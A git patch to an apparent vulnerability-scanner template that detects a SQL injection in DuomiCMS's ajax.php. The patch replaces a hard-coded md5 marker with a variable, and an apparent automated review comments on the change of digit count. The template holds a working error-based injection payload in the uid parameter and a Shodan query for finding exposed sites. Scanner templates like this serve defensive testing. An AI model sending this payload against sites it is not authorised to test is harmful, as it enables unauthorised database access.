From 8ab77083cc7bdb2451798170e9df9916cb61fd5f Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 30 Jun 2022 08:18:22 +0530
Subject: [PATCH] Update duomicms-sql-injection.yaml
---
 vulnerabilities/other/duomicms-sql-injection.yaml | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/vulnerabilities/other/duomicms-sql-injection.yaml b/vulnerabilities/other/duomicms-sql-injection.yaml
index 14c2fbac66..e0cc88e1aa 100644
--- a/vulnerabilities/other/duomicms-sql-injection.yaml
+++ b/vulnerabilities/other/duomicms-sql-injection.yaml
@@ -10,17 +10,20 @@ info:
 verified: true
 shodan-query: title:"DuomiCMS"
 tags: duomicms,sqli
+
+variables:
+ num: "999999999"
 requests:
 - method: GET
 path:
- "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))"
+ - "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5({{num}})))"
 matchers-condition: and
 matchers:
 - type: word
 words:
- '{{md5(9999999999)}}'
+ - '{{md5({{num}})}}'
 - type: status
 status:
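Review bot: The new `num` value is `999999999` (nine digits), while both removed lines hashed the literal `9999999999` (ten digits), and neither the commit message nor the template says whether that change is intended. Detection stays self-consistent because the request path and the word matcher now read the same variable, but anyone comparing results against the earlier template revision will see a different expected digest. A comment above `num` would record its role, for example `# marker value: hashed by md5() in the request path and by the word matcher, so both always agree`. The status matcher that closes the hunk continues outside it, so its expected codes are not reviewed here.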